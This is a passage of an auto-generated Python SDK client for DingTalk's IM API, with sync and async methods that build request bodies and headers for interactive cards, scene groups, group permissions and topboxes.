request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders()
return await self.send_template_interactive_card_with_options_async(request, headers, runtime)
def send_template_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.callback_url):
body['callbackUrl'] = request.callback_url
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendTemplateInteractiveCardResponse(),
self.do_roarequest('SendTemplateInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/templates/send', 'json', req, runtime)
)
async def send_template_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.callback_url):
body['callbackUrl'] = request.callback_url
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendTemplateInteractiveCardResponse(),
await self.do_roarequest_async('SendTemplateInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/templates/send', 'json', req, runtime)
)
def update_group_permission(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupPermissionHeaders()
return self.update_group_permission_with_options(request, headers, runtime)
async def update_group_permission_async(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupPermissionHeaders()
return await self.update_group_permission_with_options_async(request, headers, runtime)
def update_group_permission_with_options(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
headers: dingtalkim__1__0_models.UpdateGroupPermissionHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.permission_group):
body['permissionGroup'] = request.permission_group
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupPermissionResponse(),
self.do_roarequest('UpdateGroupPermission', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/permissions', 'json', req, runtime)
)
async def update_group_permission_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateGroupPermissionRequest,
headers: dingtalkim__1__0_models.UpdateGroupPermissionHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupPermissionResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.permission_group):
body['permissionGroup'] = request.permission_group
if not UtilClient.is_unset(request.status):
body['status'] = request.status
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupPermissionResponse(),
await self.do_roarequest_async('UpdateGroupPermission', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/permissions', 'json', req, runtime)
)
def send_interactive_card(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendInteractiveCardHeaders()
return self.send_interactive_card_with_options(request, headers, runtime)
async def send_interactive_card_async(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendInteractiveCardHeaders()
return await self.send_interactive_card_with_options_async(request, headers, runtime)
def send_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.at_open_ids):
body['atOpenIds'] = request.at_open_ids
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendInteractiveCardResponse(),
self.do_roarequest('SendInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/send', 'json', req, runtime)
)
async def send_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.SendInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.at_open_ids):
body['atOpenIds'] = request.at_open_ids
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendInteractiveCardResponse(),
await self.do_roarequest_async('SendInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/send', 'json', req, runtime)
)
def get_scene_group_info(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupInfoHeaders()
return self.get_scene_group_info_with_options(request, headers, runtime)
async def get_scene_group_info_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupInfoHeaders()
return await self.get_scene_group_info_with_options_async(request, headers, runtime)
def get_scene_group_info_with_options(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
headers: dingtalkim__1__0_models.GetSceneGroupInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupInfoResponse(),
self.do_roarequest('GetSceneGroupInfo', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/query', 'json', req, runtime)
)
async def get_scene_group_info_with_options_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupInfoRequest,
headers: dingtalkim__1__0_models.GetSceneGroupInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupInfoResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupInfoResponse(),
await self.do_roarequest_async('GetSceneGroupInfo', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/query', 'json', req, runtime)
)
def interactive_card_create_instance(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders()
return self.interactive_card_create_instance_with_options(request, headers, runtime)
async def interactive_card_create_instance_async(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders()
return await self.interactive_card_create_instance_with_options_async(request, headers, runtime)
def interactive_card_create_instance_with_options(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
headers: dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse(),
self.do_roarequest('InteractiveCardCreateInstance', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/instances', 'json', req, runtime)
)
async def interactive_card_create_instance_with_options_async(
self,
request: dingtalkim__1__0_models.InteractiveCardCreateInstanceRequest,
headers: dingtalkim__1__0_models.InteractiveCardCreateInstanceHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.receiver_user_id_list):
body['receiverUserIdList'] = request.receiver_user_id_list
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.conversation_type):
body['conversationType'] = request.conversation_type
if not UtilClient.is_unset(request.callback_route_key):
body['callbackRouteKey'] = request.callback_route_key
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.chat_bot_id):
body['chatBotId'] = request.chat_bot_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.InteractiveCardCreateInstanceResponse(),
await self.do_roarequest_async('InteractiveCardCreateInstance', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interactiveCards/instances', 'json', req, runtime)
)
def topbox_open(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxOpenHeaders()
return self.topbox_open_with_options(request, headers, runtime)
async def topbox_open_async(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxOpenHeaders()
return await self.topbox_open_with_options_async(request, headers, runtime)
def topbox_open_with_options(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
headers: dingtalkim__1__0_models.TopboxOpenHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.expired_time):
body['expiredTime'] = request.expired_time
if not UtilClient.is_unset(request.platforms):
body['platforms'] = request.platforms
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxOpenResponse(),
self.do_roarequest('TopboxOpen', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/open', 'none', req, runtime)
)
async def topbox_open_with_options_async(
self,
request: dingtalkim__1__0_models.TopboxOpenRequest,
headers: dingtalkim__1__0_models.TopboxOpenHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxOpenResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.expired_time):
body['expiredTime'] = request.expired_time
if not UtilClient.is_unset(request.platforms):
body['platforms'] = request.platforms
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxOpenResponse(),
await self.do_roarequest_async('TopboxOpen', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/open', 'none', req, runtime)
)
def get_scene_group_members(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupMembersHeaders()
return self.get_scene_group_members_with_options(request, headers, runtime)
async def get_scene_group_members_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetSceneGroupMembersHeaders()
return await self.get_scene_group_members_with_options_async(request, headers, runtime)
def get_scene_group_members_with_options(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
headers: dingtalkim__1__0_models.GetSceneGroupMembersHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.size):
body['size'] = request.size
if not UtilClient.is_unset(request.cursor):
body['cursor'] = request.cursor
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupMembersResponse(),
self.do_roarequest('GetSceneGroupMembers', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/members/query', 'json', req, runtime)
)
async def get_scene_group_members_with_options_async(
self,
request: dingtalkim__1__0_models.GetSceneGroupMembersRequest,
headers: dingtalkim__1__0_models.GetSceneGroupMembersHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetSceneGroupMembersResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.cool_app_code):
body['coolAppCode'] = request.cool_app_code
if not UtilClient.is_unset(request.size):
body['size'] = request.size
if not UtilClient.is_unset(request.cursor):
body['cursor'] = request.cursor
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
